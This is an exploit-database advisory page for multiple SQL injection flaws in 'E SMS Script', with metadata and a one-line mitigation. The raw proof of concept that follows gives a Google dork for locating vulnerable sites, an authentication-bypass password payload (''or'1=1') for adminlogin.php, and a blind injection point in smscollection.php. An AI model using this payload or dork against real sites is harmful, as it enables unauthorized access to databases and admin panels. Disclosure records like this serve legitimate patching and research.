header-logo
Suggest Exploit
vendor:
E SMS Script
by:
cr4wl3r
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: E SMS Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

E SMS Script Multiple SQL Injection Vulnerability

E SMS Script is vulnerable to multiple SQL injection vulnerabilities. An attacker can bypass authentication by sending a specially crafted request to the adminlogin.php page. An attacker can also perform a blind SQL injection attack by sending a specially crafted request to the smscollection.php page.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# E SMS Script Multiple SQL Injection Vulnerability
# By cr4wl3r http://bastardlabs.info
# http://bastardlabs.info/exploits/E_SMS_Script.txt
# Good Music: http://goo.gl/TLkEs :)
# Script: http://www.esmsscript.com/index.php?option=com_content&view=article&id=22&Itemid=41
# Dork: inurl:"smscollection.php?cat_id="

Proof of concept:

Auth Bypass

  http://bastardlabs/admin/adminlogin.php
  Username: cr4wl3r
  Password: 'or'1=1

Blind SQLi

  http://bastardlabs/smscollection.php?cat_id=[Blind SQLi]